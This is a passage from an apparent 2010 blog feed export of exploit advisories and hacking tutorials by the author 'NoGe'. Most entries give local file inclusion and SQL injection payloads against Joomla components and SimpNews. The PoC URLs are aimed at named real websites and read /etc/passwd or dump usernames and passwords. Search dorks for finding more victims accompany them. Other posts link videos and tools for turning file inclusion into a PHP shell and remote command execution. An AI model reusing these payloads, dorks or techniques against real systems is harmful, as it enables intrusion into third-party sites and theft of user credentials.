class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6225229763397874687?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6225229763397874687/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6225229763397874687' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6225229763397874687'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6225229763397874687'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-juke-box-lfi-vuln.html' title='Joomla Component Juke Box LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6767082270484267649</id><published>2010-04-06T10:25:00.005+07:00</published><updated>2010-04-08T02:17:12.169+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component Joomla Flickr LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component Joomla Flickr Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_joomlaflickr version 1.0.x&lt;br /&gt;Vendor   : http://aloiroberto.wordpress.com/software/&lt;br /&gt;Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]&lt;br /&gt;Contact  : public[dot]antisecurity[dot]org&lt;br /&gt;Home     : http://antisecurity.org/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_joomlaflickr&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.theknokkies.nl/index.php?option=com_joomlaflickr&amp;amp;controller=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_joomlaflickr"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6767082270484267649?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6767082270484267649/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6767082270484267649' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6767082270484267649'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6767082270484267649'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-joomla-flickr-lfi-vuln.html' title='Joomla Component Joomla Flickr LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8135428531028734399</id><published>2010-04-04T21:05:00.003+07:00</published><updated>2010-04-08T02:17:21.868+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component redSHOP LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component redSHOP Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_redshop version 1.0.x [ commercial ]&lt;br /&gt;Vendor   : http://redcomponent.com/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_redshop&amp;amp;view=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://bollanova.com/index.php?option=com_redshop&amp;amp;view=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_redshop"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-8135428531028734399?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/8135428531028734399/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=8135428531028734399' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8135428531028734399'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/8135428531028734399'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-redshop-lfi-vuln.html' title='Joomla Component redSHOP LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-6987393651855187337</id><published>2010-04-04T21:02:00.004+07:00</published><updated>2010-04-08T02:17:30.371+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component redTWITTER LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component redTWITTER Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_redtwitter version 1.0.x&lt;br /&gt;Vendor   : http://redcomponent.com/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_redtwitter&amp;amp;view=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.measham.org.uk/index.php?option=com_redtwitter&amp;amp;view=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;inurl:"com_redtwitter"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-6987393651855187337?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/6987393651855187337/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=6987393651855187337' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6987393651855187337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/6987393651855187337'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-redtwitter-lfi-vuln.html' title='Joomla Component redTWITTER LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-298283994901422981</id><published>2010-04-04T20:56:00.004+07:00</published><updated>2010-04-08T02:18:12.603+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Joomla Component WISro Yahoo Quotes LFI Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;[o] Joomla Component WISro Yahoo Quotes Local File Inclusion Vulnerability&lt;/span&gt;&lt;br /&gt;Software : com_wisroyq version 1.1.x [ commercial ]&lt;br /&gt;Vendor   : http://www.wis.ro/&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/index.php?option=com_wisroyq&amp;amp;controller=[LFI]&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;http://www.baird.co.uk/index.php?option=com_wisroyq&amp;amp;controller=../../../../../../../../../../../../../../../etc/passwd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Dork&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;"Powered by WISro Yahoo Quotes"&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] Solution&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Upgrade to a higher version&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-298283994901422981?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/298283994901422981/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=298283994901422981' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/298283994901422981'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/298283994901422981'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/joomla-component-wisro-yahoo-quotes-lfi.html' title='Joomla Component WISro Yahoo Quotes LFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1190444530139438767</id><published>2010-04-01T12:27:00.005+07:00</published><updated>2010-04-08T02:18:29.151+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>SimpNews Multiple SQL Injection Vuln</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] SimpNews Multiple SQL Injection Vulnerabilities&lt;/span&gt;&lt;br /&gt;Software : SimpNews version 2.16.2 and below&lt;br /&gt;Vendor   : http://www.boesch-it.de/&lt;br /&gt;Download : http://www.boesch-it.de/sw/php-scripts/simpnews/english/download.php&lt;br /&gt;Author   : NoGe&lt;br /&gt;Contact  : noge[dot]code[at]gmail[dot]com&lt;br /&gt;Blog     : http://evilc0de.blogspot.com/&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;news.php&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;master.php&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;announceprint.php&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;" mce_style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/news.php?category=[sql]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/master.php?newsnr=[sql]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;http://localhost/[path]/announceprint.php?announcenr=[sql]&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;[o] PoC&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;http://www.asff-badminton.com/news/news.php?category=2+AND+1=2+UNION+ALL+SELECT+1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+simpnews_users--&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;http://www.wecsrl.it/formazione/master.php?newsnr=-999+UNION+SELECT+0,0,0,password,username,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+simpnews_users+WHERE+usernr=1--&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;http://www.schaefer-tobies.de/simpnews/announceprint.php?announcenr=1+AND+1=2+UNION+ALL+SELECT+1,2,3,4,GROUP_CONCAT(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+FROM+simpnews_users--&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1190444530139438767?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1190444530139438767/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1190444530139438767' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1190444530139438767'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1190444530139438767'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/04/simpnews-multiple-sql-injection-vuln.html' title='SimpNews Multiple SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4343749777541569591</id><published>2010-03-30T10:50:00.005+07:00</published><updated>2010-04-08T02:11:09.223+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Local File Inclusion [LFI] to Remote Command Execution [RCE]</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;this video shows how to make Local File Inclusion vuln became Remote Command Execution&lt;br /&gt;upload and execute command via phpshell&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;tool [irc bot scan]&lt;br /&gt;&lt;a href="http://pacenoge.org/tool/vopscan5.1.zip"&gt;http://pacenoge.org/tool/vopscan5.1.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;download video&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;a href="http://pacenoge.org/tool/lfi2rce.swf"&gt;http://pacenoge.org/tool/lfi2rce.swf&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;watch the video&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;a href="http://pacenoge.org/tool/lfi2rce.html"&gt;http://pacenoge.org/tool/lfi2rce.html&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;Greetz&lt;code class="spaces"&gt;&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;span class="fullpost"&gt;&lt;code class="spaces"&gt;&lt;/code&gt;&lt;code class="plain plain"&gt;Vrs-hCk OoN_BoY Paman zxvf &lt;/code&gt;&lt;code class="plain plain"&gt;s4va matthews &lt;/code&gt;&lt;code class="plain plain"&gt;Angela Zhang&lt;/code&gt; &lt;code class="plain plain"&gt;stardustmemory&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4343749777541569591?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4343749777541569591/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4343749777541569591' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4343749777541569591'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4343749777541569591'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/03/local-file-inclusion-lfi-to-remote.html' title='Local File Inclusion [LFI] to Remote Command Execution [RCE]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-7657269275531786807</id><published>2010-03-26T22:25:00.005+07:00</published><updated>2010-03-29T21:25:56.786+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Upload phpshell via LFI vuln</title><content type='html'>&lt;pre&gt;&lt;br /&gt;using com_ckforms LFI vuln&lt;br /&gt;http://www.exploit-db.com/exploits/11785&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;tool&lt;br /&gt;mozilla addons &gt;&gt; tamper data&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;download video&lt;br /&gt;&lt;a href="http://pacenoge.org/tool/lfi.swf"&gt;http://pacenoge.org/tool/lfi.swf&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;watch the video&lt;br /&gt;&lt;/span&gt;&lt;a href="http://pacenoge.org/tool/lfi.html"&gt;http://pacenoge.org/tool/lfi.html&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;br /&gt;Greetz&lt;code class="spaces"&gt;&lt;br /&gt;&lt;/code&gt;&lt;code class="plain plain"&gt;Vrs-hCk OoN_BoY Paman zxvf &lt;/code&gt;&lt;code class="plain plain"&gt;s4va matthews &lt;/code&gt;&lt;code class="plain plain"&gt;Angela Zhang&lt;/code&gt; &lt;code class="plain plain"&gt;stardustmemory&lt;br /&gt;&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-7657269275531786807?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/7657269275531786807/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=7657269275531786807' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7657269275531786807'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/7657269275531786807'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2010/03/upload-phpshell-via-lfi-vuln.html' title='Upload phpshell via LFI vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-8019309837081416276</id><published>2010-03-22T03:34:00.005+07:00</published><updated>2010-04-08T02:09:38.259+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Simple SQLi Dumper v5.1 [ How To ]</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;[o] attention&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;USE THIS TOOL FOR EDUCATION PURPOSE ONLY.&lt;br /&gt;WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL.&lt;br /&gt;USE IT AT YOUR OWN RISK!!&lt;br /&gt;&lt;br /&gt;SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )&lt;br /&gt;SSDp How To by NoGe ( mario[at]antisecurity[dot]org )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] what is SSDp?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] download SSDp v5.1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://okedeh.co.tv/ssdp51.tar.gz"&gt;http://okedeh.co.tv/ssdp51.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;a href="http://pacenoge.org/tool/ssdp51.tar.gz"&gt;http://pacenoge.org/tool/ssdp51.tar.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[o] function&lt;br 